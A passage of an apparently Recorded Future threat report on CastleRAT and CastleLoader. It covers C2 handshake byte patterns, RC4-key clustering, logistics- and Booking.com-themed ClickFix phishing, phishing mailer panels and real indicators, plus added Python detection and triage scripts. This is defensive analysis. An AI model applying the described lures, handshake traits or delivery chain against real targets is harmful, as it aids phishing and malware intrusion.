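from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

EXT_INIT_TRAILER = bytes.fromhex("07000000")   # request trailer in the extended variant
STD_INIT_TRAILER = bytes.fromhex("01000000")   # usual request trailer, also used as an ack
EXT_REPLY_TRAILER = bytes.fromhex("9eff7470")  # server reply trailer in the extended variant
RC4_KEY_LEN = 16                               # CastleRAT uses hard-coded 16-byte RC4 keys


@dataclass(frozen=True)
class Flow:
    client: str
    server: str
    to_server: bytes   # bytes the client sent
    to_client: bytes   # bytes the server answered with


def classify_flow(flow: Flow) -> Optional[str]:
    """Label one connection. Labels are chosen here; the byte patterns are the report's."""
    c, s = flow.to_server, flow.to_client
    if c.endswith(EXT_INIT_TRAILER) and s.endswith(EXT_REPLY_TRAILER):
        return "ext-init"      # request ends 07 00 00 00, reply ends 9e ff 74 70
    if len(c) == RC4_KEY_LEN and s == STD_INIT_TRAILER:
        return "key-push"      # client sends only the encrypted key, server acks 01 00 00 00
    if c == STD_INIT_TRAILER and len(s) == RC4_KEY_LEN:
        return "key-pull"      # client sends 01 00 00 00, server returns only the key
    if c.endswith(STD_INIT_TRAILER):
        return "std-init"      # the ordinary CastleRAT request trailer
    return None                # not something this matcher knows about


# Expected order of stages, with which of the two C2s each stage talks to.
_SEQUENCE = ("ext-init", "ext-init", "key-push", "key-pull")


def find_dual_c2_handshake(flows: List[Flow]) -> Dict[str, Tuple[str, str]]:
    """Return {client: (c2_a, c2_b)} for each client whose flows, in capture
    order, show ext-init to A, ext-init to B, key-push to A, key-pull to B."""
    per_client: Dict[str, List[Flow]] = {}
    for f in flows:
        per_client.setdefault(f.client, []).append(f)
    hits: Dict[str, Tuple[str, str]] = {}
    for client, seq in per_client.items():
        labelled = [(f.server, classify_flow(f)) for f in seq]
        for i in range(len(labelled) - 3):
            (a, l1), (b, l2), (a2, l3), (b2, l4) = labelled[i:i + 4]
            if (l1, l2, l3, l4) == _SEQUENCE and a == a2 and b == b2 and a != b:
                hits[client] = (a, b)
                break
    return hits


# Constructed sample capture: one ordinary-looking request to a decoy server,
# then the four stages against the two C2 addresses named in the report.
_KEY = bytes(range(16))  # constructed stand-in for the encrypted 16-byte RC4 key
SAMPLE_FLOWS = [
    Flow("10.0.0.5", "203.0.113.9", bytes(8) + STD_INIT_TRAILER, bytes(4)),
    Flow("10.0.0.5", "77.238.241.203", bytes(20) + EXT_INIT_TRAILER, bytes(4) + EXT_REPLY_TRAILER),
    Flow("10.0.0.5", "5.35.44.176", bytes(20) + EXT_INIT_TRAILER, bytes(4) + EXT_REPLY_TRAILER),
    Flow("10.0.0.5", "77.238.241.203", _KEY, STD_INIT_TRAILER),
    Flow("10.0.0.5", "5.35.44.176", STD_INIT_TRAILER, _KEY),
]

if __name__ == "__main__":
    for f in SAMPLE_FLOWS:
        print(f"{f.client} -> {f.server}: {classify_flow(f)}")
    for client, (a, b) in find_dual_c2_handshake(SAMPLE_FLOWS).items():
        print(f"{client}: dual-C2 handshake with {a} and {b}")
```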
        <h4>Clustering by RC4 Key</h4>
        <p>Analysis of CastleRAT infrastructure identified multiple clusters of IP addresses grouped by hard-coded RC4 encryption keys (see <strong>Figure 4</strong>). While each RC4 key forms a distinct cluster, all clusters exhibit some degree of overlap through shared keys, suggesting a deliberate or coordinated relationship rather than a coincidental overlap. This interconnected structure suggests a shared tooling or deployment framework underpinning both CastleRAT and CastleLoader operations. Although this does not conclusively establish single-threat actor control, the degree of overlap implies a common developer or operator ecosystem rather than independent, uncoordinated usage of the malware.</p>
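        <p>The key-based clustering described above, as an added example that is not part of the report or of Recorded Future tooling: it groups C2 hosts by the RC4 key each sample carries, then merges clusters that share a host and reports those bridge hosts. The key “NanuchkaUpyachka” and the three addresses 104[.]225[.]129[.]171, 144[.]208[.]126[.]50 and 195[.]85[.]115[.]44 come from this report; the sample identifiers, the two other keys, the 198.51.100.x and 203.0.113.x hosts, and the pairing of 195[.]85[.]115[.]44 with a second key are constructed.</p>

```python
"""
Cluster CastleRAT C2 servers by hard-coded RC4 key and find the hosts that
bridge otherwise separate key clusters, mirroring the report's Figure 4 analysis.
"""
from collections import defaultdict
from typing import Dict, List, Set, Tuple

# Constructed observations: (sample_id, c2_ip, rc4_key). Only the key
# "NanuchkaUpyachka" and the 104./144./195. addresses are taken from the report.
OBSERVATIONS: List[Tuple[str, str, bytes]] = [
    ("s01", "104.225.129.171", b"NanuchkaUpyachka"),
    ("s02", "144.208.126.50", b"NanuchkaUpyachka"),
    ("s03", "195.85.115.44", b"NanuchkaUpyachka"),
    ("s04", "195.85.115.44", b"CONSTRUCTEDKEY01"),  # same host, second key: a bridge
    ("s05", "198.51.100.7", b"CONSTRUCTEDKEY01"),
    ("s06", "198.51.100.8", b"CONSTRUCTEDKEY01"),
    ("s07", "203.0.113.20", b"CONSTRUCTEDKEY02"),   # no shared host: stays isolated
    ("s08", "203.0.113.21", b"CONSTRUCTEDKEY02"),
]


def index_by_key(observations) -> Dict[bytes, Set[str]]:
    """Map each RC4 key to the C2 hosts seen with it; reject keys that are not 16 bytes."""
    by_key: Dict[bytes, Set[str]] = defaultdict(set)
    for _sid, ip, key in observations:
        if len(key) != 16:
            raise ValueError(f"RC4 key for {ip} is {len(key)} bytes, expected 16")
        by_key[key].add(ip)
    return by_key


def bridge_hosts(by_key: Dict[bytes, Set[str]]) -> Dict[str, Set[bytes]]:
    """Hosts observed with more than one key, i.e. the overlap between key clusters."""
    keys_per_ip: Dict[str, Set[bytes]] = defaultdict(set)
    for key, ips in by_key.items():
        for ip in ips:
            keys_per_ip[ip].add(key)
    return {ip: keys for ip, keys in keys_per_ip.items() if len(keys) > 1}


def connected_clusters(by_key: Dict[bytes, Set[str]]) -> List[List[str]]:
    """Merge key clusters that share a host (union-find); returns sorted host lists."""
    parent: Dict[str, str] = {}

    def find(x: str) -> str:
        parent.setdefault(x, x)
        while parent[x] != x:
            parent[x] = parent[parent[x]]  # path halving
            x = parent[x]
        return x

    def union(a: str, b: str) -> None:
        ra, rb = find(a), find(b)
        if ra != rb:
            parent[ra] = rb

    for ips in by_key.values():
        hosts = sorted(ips)
        for ip in hosts:
            union(hosts[0], ip)  # every host sharing this key joins one component
    groups: Dict[str, List[str]] = defaultdict(list)
    for ip in parent:
        groups[find(ip)].append(ip)
    return sorted((sorted(g) for g in groups.values()), key=lambda g: g[0])


def analyse(observations) -> dict:
    by_key = index_by_key(observations)
    return {
        "clusters": connected_clusters(by_key),
        "bridges": {ip: sorted(k.decode() for k in keys)
                    for ip, keys in bridge_hosts(by_key).items()},
        "keys_seen": len(by_key),
    }


if __name__ == "__main__":
    result = analyse(OBSERVATIONS)
    for cluster in result["clusters"]:
        print("cluster:", ", ".join(cluster))
    for ip, keys in result["bridges"].items():
        print(f"bridge host {ip} carries keys {keys}")
```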
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1be5107977c3267366984e116b333887daf9703ac.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1390" />
        </p>
        <p><em><strong>Figure 4</strong>: RC4 key clusters (Source: Recorded Future)</em></p>
        <h3>CastleLoader</h3>
        <h4>Infrastructure Analysis</h4>
        <p>Insikt Group identified additional C2 infrastructure associated with CastleLoader. The related domains and IP addresses are listed in <strong>Appendix A</strong>. Notably, several domains share the same WHOIS start of authority (SOA) email address, indicating they were likely registered by the same threat actor.</p>
        <p>The domain <em>oldspicenotsogood[.]shop</em> is also linked to several other domains listed in <strong>Appendix B</strong>, which are likely used for malicious activity, including impersonation of legitimate brands such as DocuSign, Norton, and TradingView. Additionally, at least one of these domains, <em>testdomain123123[.]shop</em>, has been identified as a LummaC2 C2 server.</p>
        <h3>Activity Clusters</h3>
        <p>Insikt Group identified four distinct clusters of activity associated with the deployment of CastleLoader (see <strong>Figure 4</strong>). The first cluster, tracked as TAG-160, appears to be highly targeted toward the logistics sector, employing techniques specifically tailored to this industry. In contrast, the second cluster, tracked as TAG-161, exhibits a broader targeting scope and leverages Booking.com-themed lures. The third cluster likewise impersonates Booking.com but shows no overlap with TAG-161. The fourth cluster relies on malvertising campaigns and fake software update mechanisms.</p>
        <p>Based on Insikt Group’s assessment, these clusters are associated with distinct users deploying CastleLoader, as no overlap in infrastructure or tactics was observed between them. At this stage, the exact nature of the relationship between these users and GrayBravo (formerly tracked as TAG-150) remains unclear. Insikt Group further assesses that additional CastleLoader users are likely active, supported by proprietary Recorded Future intelligence and the large number of identified panels, which collectively suggest a broader user base.</p>
        <h4>Cluster 1: Logistics Sector-Focused Activity Tracked as TAG-160</h4>
        <p>Cluster 1, tracked as TAG-160, has been active since at least March 2025 and remains operational at the time of analysis. TAG-160 employs infrastructure that impersonates logistics companies and leverages logistics-themed phishing lures, among other tactics. It uses ClickFix techniques to deliver CastleLoader, among other payloads. Evidence suggests the cluster operates a mix of threat actor-controlled and compromised infrastructure. Additionally, it has been observed exploiting weaknesses in target organizations’ email security, such as spoofing legitimate email senders from logistics companies to enhance the credibility of its phishing campaigns. In addition, Cluster 1 uses access to the legitimate freight-matching platforms DAT Freight &amp; Analytics and Loadlink Technologies for multiple purposes.</p>
        <h5>Attack Flow</h5>
        <p>Cluster 1 employs spearphishing campaigns in combination with ClickFix techniques to compromise victims. <strong>Figure 5</strong> illustrates a high-level overview of the phishing attack flow.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1a3fbdc837ac260e056768d86ba670ab247081c07.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="723" />
        </p>
        <p><em><strong>Figure 5</strong>: ClickFix attack flow used by TAG-160 (Source: Recorded Future)</em></p>
        <p>The attack chain typically begins with either a spoofed legitimate email address (for example, <em>no-reply[@]englandlogistics[.]com</em>) or a threat actor-controlled address associated with a typosquatted domain (for example, <em>englandloglstics[.]com</em>), impersonating companies such as England Logistics. Historically, such emails have been sent to US-based carriers, presenting fraudulent freight quotes that appear to originate from England Logistics. However, other organizations likely to be influenced by logistics-themed lures cannot be ruled out as potential targets.</p>
        <p>The emails prompt recipients to click a link to view a supposed rate confirmation for a shipment, instructing them to copy and paste the link into a browser if it does not open directly. The threat actors often add a sense of urgency, warning that the link will soon expire. Clicking the link leads victims to a landing page designed to harvest information (see <strong>Figure 6</strong>). Insikt Group has <a href="https://www.urlquery.net/report/99d39dd3-bfd6-44fa-9275-e7d7e7a22ac9">observed</a> multiple variations of these landing pages.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_155561bfb43adf9b6751ba6800e35c480f96c98ed.png?width=750&amp;format=png&amp;optimize=medium" width="966" height="1052" />
        </p>
        <p><em><strong>Figure 6</strong>: “dpeforms” lure used by TAG-160 (Source: Recorded Future)</em></p>
        <p>Notably, although Insikt Group was unable to retrieve the landing page associated with another Cluster 1–linked domain, <em>loadstracking[.]com</em>, indexed Google search results indicate that the domain likely hosted the same or a similar page as observed in <strong>Figure 7</strong>. DPE likely stands for “Direct Port Entry,” which is a system designed for exporters, allowing goods to be directly moved from their premises to the port and loaded onto the vessel for export without being transferred to a container freight station.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1a43f26ffef45a6c789ad537c5e1232e719f5353f.png?width=750&amp;format=png&amp;optimize=medium" width="743" height="147" />
        </p>
        <p><em><strong>Figure 7</strong>: “dpeforms” page found in Google Search (Source: Recorded Future)</em></p>
        <p>After submitting their information, the victim is presented with ClickFix-style instructions, guiding them through a series of steps purportedly required to complete a document signing process (see <strong>Figure 8</strong>). By incorporating the DocuSign logo, the threat actors likely aim to enhance the perceived legitimacy of the page and further deceive the victim.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1a29b8734977ac6a714e89ce057ad87cfbcb12c81.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="633" />
        </p>
        <p><em><strong>Figure 8</strong>: DocuSign-themed ClickFix used by TAG-160 (Source: Recorded Future)</em></p>
        <p>By following the instructions shown in <strong>Figure 8</strong>, the victim unknowingly executes the command illustrated in <strong>Figure 9</strong>. This command runs silently in the background, downloads and extracts a payload archive from a remote IP address, executes Python-based malware using <code>pythonw.exe</code>, and displays a decoy message to appear legitimate. Observed payloads delivered through this method include CastleLoader, HijackLoader, Rhadamanthys, and zgRAT.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_194d883d95935fed30bcd62de8a8aa760b4f8dd9d.png?width=750&amp;format=png&amp;optimize=medium" width="1262" height="206" />
        </p>
        <p><em><strong>Figure 9</strong>: ClickFix command (Source: Recorded Future)</em></p>
        <h5>Use of Compromised Infrastructure</h5>
        <p>As part of TAG-160’s phishing infrastructure, the threat actors appear to rely not only on spoofed email addresses, as previously described, but also on compromised systems. Insikt Group has observed indications that the threat actors likely leveraged compromised infrastructure to send phishing emails. For example, at least one domain used to distribute phishing messages appeared in infostealer logs (such as LummaC2 logs) that included stolen credentials for a Namecheap account.</p>
        <h5>Infrastructure Analysis</h5>
        <p>Insikt Group identified a large number of domains and IP addresses associated with Cluster 1, all of which either impersonate logistics companies or align with logistics-themed phishing lures (see <strong>Appendix C</strong>). Notably, the majority of these domains include the subdomain <em>apps[.]englandlogistics</em> (for example, <em>apps[.]englandlogistics[.]rateconfirmations[.]com</em>), suggesting they were likely designed to impersonate England Logistics, as outlined in the previous section. One domain, <em>loadstrucking[.]com</em>, instead featured the subdomain <em>app[.]england</em>, following a similar naming pattern.</p>
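        <p>The two naming patterns described for Cluster 1, a brand name carried in a subdomain label of an unrelated registrable domain (<em>apps[.]englandlogistics[.]rateconfirmations[.]com</em>) and a one-character typosquat of the genuine domain (<em>englandloglstics[.]com</em>), can be turned into a simple triage check for mail-gateway or DNS logs. The following is an added illustration, not Insikt Group tooling; it assumes <em>englandlogistics.com</em> is the brand’s only genuine domain and uses a two-label approximation of the registrable domain.</p>

```python
"""Triage hostnames for logistics-brand impersonation.

Added example for illustration; not Insikt Group tooling. It encodes two naming
patterns described for Cluster 1: a brand name carried in a subdomain label of an
unrelated registrable domain (apps.englandlogistics.<other>.com), and a
one-character typosquat of the brand's real domain (englandloglstics.com).
Sample hostnames are the defanged indicators quoted in the text.
"""
from __future__ import annotations

# Brand -> (legitimate registrable domains, tokens that signal the brand).
# Assumption for the example: englandlogistics.com is the only genuine domain.
# Short tokens such as "england" widen coverage but raise false positives.
BRANDS: dict[str, tuple[set[str], tuple[str, ...]]] = {
    "englandlogistics": ({"englandlogistics.com"}, ("englandlogistics", "england")),
}

SAMPLE_HOSTS = [
    "no-reply[@]englandlogistics[.]com",                # spoofed genuine domain
    "englandloglstics[.]com",                           # typosquat (i -> l)
    "apps[.]englandlogistics[.]rateconfirmations[.]com",
    "app[.]england[.]loadstrucking[.]com",
    "files[.]loadstracking[.]com",                      # no brand token at all
]


def refang(indicator: str) -> str:
    """Turn a defanged hostname or e-mail address into a plain hostname."""
    host = indicator.replace("[.]", ".").replace("[@]", "@")
    # Keep only the domain part of an e-mail address.
    return host.rsplit("@", 1)[-1].strip(".").lower()


def registrable_domain(host: str) -> str:
    """Last two labels. Simplification: ignores multi-part suffixes such as co.uk."""
    return ".".join(host.split(".")[-2:])


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to catch single-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(indicator: str) -> tuple[str, str | None]:
    """Return (verdict, brand). Verdicts:
    legitimate              - the brand's real domain; only SPF/DKIM/DMARC results
                              can tell whether such a sender was spoofed
    typosquat               - registrable domain within edit distance 1 of the brand
    subdomain_impersonation - brand token appears left of the registrable domain
    unrelated               - no brand signal found
    """
    host = refang(indicator)
    labels = host.split(".")
    if len(labels) < 2:
        return "unrelated", None
    reg = registrable_domain(host)
    sub_labels = labels[:-2]
    for brand, (legit, tokens) in BRANDS.items():
        if reg in legit:
            return "legitimate", brand
        if levenshtein(labels[-2], brand) == 1:
            return "typosquat", brand
        if any(tok in sub_labels for tok in tokens):
            return "subdomain_impersonation", brand
    return "unrelated", None


def triage(indicators: list[str]) -> dict[str, str]:
    """Map each indicator to its verdict, for feeding a blocklist or alert queue."""
    return {ind: classify(ind)[0] for ind in indicators}


if __name__ == "__main__":
    for ind, verdict in triage(SAMPLE_HOSTS).items():
        print(f"{verdict:24} {ind}")
```

        <p>A “legitimate” verdict only means the domain is genuine; whether a message from it was spoofed is decided by the SPF, DKIM, and DMARC results in the received headers.</p>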
        <p>Insikt Group <a href="https://urlscan.io/result/0197f23f-1845-74dd-90af-539a30c3aa3e">identified</a> the subdomain <em>files[.]loadstracking[.]com</em>, hosted on the IP address <em>89[.]185[.]84[.]211</em> between July 6 and September 26, 2025, which was serving the file <code>newtag.zip</code> (SHA256: d87ccd5a2911e46a1efbc0ef0cfe095f136de98df055eacd1c82de76ae6fecec). The ZIP archive contained a legitimate WinGup executable for Notepad++ that sideloaded a malicious libcurl.dll identified as DonutLoader. This loader subsequently retrieved three intermediate payloads from the legitimate subdomain <em>files-accl[.]zohoexternal[.]com</em>.</p>
        <h5>Domain Re-Registration Tactic</h5>
        <p>Insikt Group assesses that, to further enhance the perceived legitimacy of their infrastructure, the threat actor deliberately re-registered domains previously associated with legitimate logistics companies, in addition to using typosquatted domains. <strong>Figure 10</strong> provides two examples of this activity.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1767d51180ebfc148db82f1ef427279295a0b4538.png?width=750&amp;format=png&amp;optimize=medium" width="1082" height="206" />
            </div>
          </div>
        </div>
        <p><em><strong>Figure 10</strong>: Re-registration of logistics-themed domains (Source: Recorded Future)</em></p>
        <p>Notably, the domain <em>cdlfreightlogistics[.]com</em> appears to have previously hosted a website associated with the legitimate company CDL Freight Logistics, Inc. in 2023. Similarly, the domain <em>hometownlogisticsllc[.]com</em> hosted a website for Hometown Logistics LLC in 2021 (see <strong>Figure 11</strong>).</p>
        <p><em><strong>Figure 11</strong>: Registration of domains previously owned by legitimate logistics companies (Source: Recorded Future)</em></p>
        <h5>Public Complaints and Suspected Access to DAT and Loadlink</h5>
        <p>Some of the domains listed in the <strong>Infrastructure Analysis</strong> section have been publicly referenced in connection with suspicious or fraudulent activity. For example, the email address <em>david[@]cdlfreightlogistics[.]com</em>, associated with the domain <em>cdlfreightlogistics[.]com</em>, first appeared on August 26, 2025, in a public Telegram channel named “current_hot_loads”, a forum used by individuals and companies in the logistics industry to share information such as market rates. In that instance, a user asked other members whether an email was legitimate (see <strong>Figure 12</strong>). Several respondents indicated they did not believe it to be legitimate.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1416daca3dfc49f61ff3c646109de20af7819dbea.png?width=750&amp;format=png&amp;optimize=medium" width="800" height="413" />
        </p>
        <p><em><strong>Figure 12</strong>: Example phishing email sent by TAG-160 (Source: Recorded Future)</em></p>
        <p>While Insikt Group was unable to obtain additional details about the email exchange linked to the email posted in the channel, the available text suggests that the threat actor initially contacted potential victims without including malicious content, likely aiming to establish rapport before sending follow-up messages containing malicious links.</p>
        <p>In another instance, Insikt Group identified a post from an employee of a legitimate logistics company based in Rhode Island, USA, describing an incident in which a threat actor created accounts impersonating their company on DAT Freight &amp; Analytics (<em>dat.com</em>) and Loadlink Technologies (<em>loadlink.ca</em>), both platforms operating in the freight matching industry (see <strong>Figure 13</strong>). The fraudulent registrations used fake company information, including the email address <em>paul[@]mrlogsol[.]ca</em>, which is associated with Cluster 1–linked infrastructure. Notably, in line with Cluster 1’s typical patterns, the email addresses used in these operations often consist of only a first name (for example, Paul). The employee reported having contacted both DAT and Loadlink to alert them to the fraudulent activity.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_197d2097858ae7d6502840ec86c8d25d764e75569.png?width=750&amp;format=png&amp;optimize=medium" width="890" height="788" />
        </p>
        <p><em><strong>Figure 13</strong>: Complaint on Facebook written by an individual targeted by TAG-160 (Source: Recorded Future)</em></p>
        <p>Based on a confirmation email from one of the platforms’ abuse reporting teams, which the employee shared on Facebook as well, it appears that the threat actor was also using a Gmail address impersonating their company, <em>maritza[.]rmlogisticsol[@]gmail[.]com</em> (see <strong>Figure 14</strong>).</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_101b71323b17bacddaaeb2ba1f64855fb611f5936.png?width=750&amp;format=png&amp;optimize=medium" width="1128" height="988" />
        </p>
        <p><em><strong>Figure 14</strong>: Email shared by an individual targeted by TAG-160 (Source: Recorded Future)</em></p>
        <p>Threat actors associated with Cluster 1 appear to have access to fraudulent DAT and Loadlink accounts, as evidenced by a user report of fraudulent activity on Facebook (see <strong>Figure 13</strong>) and further supported by additional profiles identified by Insikt Group (see <strong>Figure 15</strong>). Furthermore, Insikt Group assesses that the threat actors may also have access to compromised legitimate accounts, given the substantial volume of stolen credentials associated with the domains <em>dat[.]com</em> and <em>loadlink[.]ca</em> observed in Recorded Future Identity Intelligence.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1eb360521afb816016f9bf42b54a29065e55cd924.png?width=750&amp;format=png&amp;optimize=medium" width="1280" height="445" />
        </p>
        <p><em><strong>Figure 15</strong>: Account information linked to TAG-160 (Source: Recorded Future)</em></p>
        <p>Access to platforms like DAT Freight &amp; Analytics and Loadlink Technologies not only enables the threat actors to enhance the appearance of legitimacy, allowing them to maintain plausible profiles should potential victims attempt verification, but also provides opportunities to gather contact information for prospective targets and obtain additional contextual data, such as details on specific loads, dates and times, documents, or related materials, which can then be repurposed as spearphishing lures. In addition, although not verified in this specific case, the threat actors may also post fraudulent load listings containing malicious content, potentially resulting in malware infections.</p>
        <h5>Possible Overlap with September 2024 Campaign</h5>
        <p>In September 2024, Proofpoint <a href="https://www.proofpoint.com/us/blog/threat-insight/security-brief-actor-uses-compromised-accounts-customized-social-engineering">reported</a> on an unattributed activity cluster observed since at least May 2024. The threat actors targeted transportation and logistics companies in North America to distribute various malware families, including LummaC2, StealC, and NetSupport RAT, as well as remote monitoring and management (RMM) tools such as SimpleHelp, PDQ Connect, Fleetdeck, and ScreenConnect. The campaigns employed several techniques: The threat actors compromised legitimate email accounts belonging to transportation and shipping companies, injecting malicious content into existing email threads to enhance credibility. They also used compromised accounts on DAT Freight &amp; Analytics and Loadlink platforms to post fraudulent load listings containing malicious URLs leading to RMM downloads. Lastly, they launched broader phishing waves that directed recipients to staging web pages hosting RMM installers. Most campaigns involved Google Drive URLs or attached .URL shortcut files that, when executed, used SMB to retrieve an executable from a remote share, leading to malware installation.</p>
        <p>While Insikt Group has not identified direct technical overlaps (for example, shared infrastructure), the similar targeting and partially overlapping tactics, particularly the use of DAT Freight &amp; Analytics and Loadlink, suggest a possible connection between this activity cluster and Cluster 1 (this is a low-confidence assessment).</p>
        <p>Notably, in November 2025, Proofpoint <a href="https://www.proofpoint.com/us/blog/threat-insight/remote-access-real-cargo-cybercriminals-targeting-trucking-and-logistics">reported</a> again on a possibly related activity where cybercriminals targeted trucking and logistics companies using RMM tools to hijack shipments. The attackers lured victims through fake load postings or compromised email threads, delivering malware or RMM software to gain access. This campaign highlights the growing convergence of cyber and physical cargo theft as criminals exploit digital logistics systems.</p>
        <h4>Cluster 2: Matanbuchus and Mailer Tool Activity Tracked as TAG-161</h4>
        <p>Cluster 2, tracked as TAG-161, has been active since at least June 2025 and remains operational at the time of analysis. The cluster leverages infrastructure impersonating Booking.com and employs ClickFix techniques. It primarily delivers CastleLoader, but Insikt Group also observed it distributing other payloads, notably Matanbuchus. Evidence indicates that the cluster relies mainly on threat actor-controlled infrastructure. Furthermore, Insikt Group identified previously unreported phishing email management tooling that appears to be used by threat actors linked to Cluster 2.</p>
        <h5>Matanbuchus Activity and Booking.com-Themed Infrastructure</h5>
        <p>Alongside CastleLoader, several Matanbuchus samples were distributed through Booking.com-themed ClickFix campaigns associated with Cluster 2. Notably, Insikt Group had previously reported Matanbuchus activity linked to CastleRAT in an earlier publication, where the Matanbuchus C2 panel was hosted on the adjacent IP address, <em>185[.]39[.]19[.]164</em> (see <strong>Figure 16</strong>).</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1fee0f400f126652867b44778e0424c29d3f6aac1.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1200" />
        </p>
        <p><em><strong>Figure 16</strong>: Matanbuchus panel on 185[.]39[.]19[.]164 (Source: Recorded Future)</em></p>
        <p>Matanbuchus is a C-based downloader MaaS available since 2021. One of its primary objectives is secrecy, which is in part fostered by limiting sales to a select number of customers. Currently at version three, it is continually maintained and improved by its creator BelialDemon. <a href="https://app.recordedfuture.com/portal/intelligence-card/edxAL9/overview?organization=uhash:5cJsHMHeSM">BelialDemon</a> offers Matanbuchus 3.0 as a monthly rental service with two pricing tiers based on the communication protocol: $10,000 per month for the <a href="https://app.recordedfuture.com/portal/intelligence-card/0SsNc/overview?organization=uhash:5cJsHMHeSM">HTTPS</a>-based version and $15,000 per month for the DNS-based version.</p>
        <p>Recorded Future Malware Intelligence’s most recent Matanbuchus sample at the time of writing <a href="https://tria.ge/251009-y1lyrsyzcx/behavioral1">communicated</a> with its C2 server at <em>mechiraz[.]com</em>, a domain behind Cloudflare but linked to the IP address <em>5[.]178[.]1[.]8</em> (TRIBEKA-AS, PA; AS211059). This IP address was also associated with the domain <em>nicewk[.]com</em>, previously <a href="https://www.morphisec.com/blog/ransomware-threat-matanbuchus-3-0-maas-levels-up/">reported</a> by Morphisec. Historical analysis of the same IP revealed several additional Matanbuchus C2 domains, including <em>galaxioflow[.]com</em> and <em>nimbusvaults[.]com</em>.</p>
        <h5>Additional Booking.com-Themed Infrastructure</h5>
        <p>By analyzing the same /24 CIDR range that hosted the Matanbuchus infrastructure during the period of observed activity, Insikt Group identified additional IP addresses and domains linked to Booking.com-themed ClickFix operations. These network indicators, detailed in <strong>Appendix D</strong>, are tracked by Insikt Group as part of Cluster 2.</p>
        <h5>Phishing Email Management Tooling</h5>
        <p>By analyzing the IP addresses hosting the domains listed in <strong>Appendix D</strong>, Insikt Group identified three that stood out because each hosted previously unreported websites or management panels operating on high ports. The three panels featured the following HTML titles: “Менеджер Email” (“Email Manager”), “Менеджер Редиректов и рассылок” (“Redirect and Mailing Manager”), and “Менеджер Редиректов и Email” (“Redirect and Email Manager”). Based on their visual appearance, technical implementation, and thematic focus, Insikt Group assesses that these websites are used in tandem as part of campaigns specifically targeting Booking.com.</p>
        <h5>Website 1: Redirect and Email Manager (“Менеджер Редиректов и Email”)</h5>
        <p>The first website, <a href="https://urlscan.io/result/0199c9ff-8739-76c3-b84e-a6c997c2e901">hosted</a> on port 56723, serves as a web-based interface for managing bulk redirections and email campaigns (see <strong>Figure 17</strong>). It integrates redirect generation, SMTP configuration, and email distribution capabilities within a single dashboard. The design, terminology, and functionality closely align with those typically observed in malspam or phishing infrastructure management panels.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_136c896a9d13593c36ce2ff3aa14bf18009f7b8df.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1200" />
        </p>
        <p><em><strong>Figure 17</strong>: Page linked to “Redirect and Email Manager” tool (Source: Recorded Future)</em></p>
        <p>Within the document object model (DOM) of the website, Insikt Group identified two email addresses, one of which is likely a compromised account used to send phishing emails. At the time of discovery, the rambler email address, likely a burner account, appeared within the page’s SMTP configuration with associated credentials, indicating its use as the primary sender account for automated bulk email delivery, consistent with the panel’s design for coordinated phishing or spam distribution. The DOM also contained an AWS access key.</p>
        <p>Additionally, the DOM referenced a set of domains, some of which are listed in <strong>Appendix D</strong>, while others were newly identified and are listed in <strong>Appendix E</strong>. By searching for the phrase “Сервис редиректов работает для [domain]” (translated as “The redirect service works for [domain]”), Insikt Group discovered further related domains, likewise shown in <strong>Appendix E</strong>.</p>
        <h5>Website 2: Email Manager (“Менеджер Email”)</h5>
        <p>The second website, <a href="https://urlscan.io/result/0199c9ff-89fc-7485-9c2c-d9124361dc00">hosted</a> on port 56724, closely resembles the first “Redirect and Email Manager” panel but exhibits several notable configuration differences (see <strong>Figure 18</strong>). These include a distinct AWS username, an SMTP sender address, <em>bred[@]booking-porta[.]com</em>, as well as different logging settings and a few additional indicators of compromise. Furthermore, the website specified <em>109[.]104[.]153[.]87</em> as its proxy server.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1dd3b5b946434f96299c400d804be3d2845722bc0.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1200" />
        </p>
        <p><em><strong>Figure 18</strong>: Page linked to “Email Manager” tool (Source: Recorded Future)</em></p>
        <h5>Website 3: Booking-Mailer V2.2 (“Менеджер Редиректов и рассылок”)</h5>
        <p>The third website, <a href="https://urlscan.io/result/0199c9ff-8cbc-7029-b6ab-dfcc24a26c96">hosted</a> on port 56725, features a substantially larger DOM and functions as a combined redirect generator and mass-mailing platform (see <strong>Figure 19</strong>). The user interface exposes key capabilities, including domain selection, subdomain base-name configuration, HTML email templating (supporting URL placeholders for generated redirects), target file uploads, worker/thread management, SMTP pool configuration and validation, proxy editing, and real-time logging and statistics. Redirects are constructed using a domain and base name to generate unique subdomain links following the format: <code>[identifier].[base_name].[main_domain]</code>.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1a869a94ae293e8228df02d97b7bb9de354345613.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1200" />
        </p>
        <p><em><strong>Figure 19</strong>: Page linked to “Booking-Mailer V2.2” tool (Source: Recorded Future)</em></p>
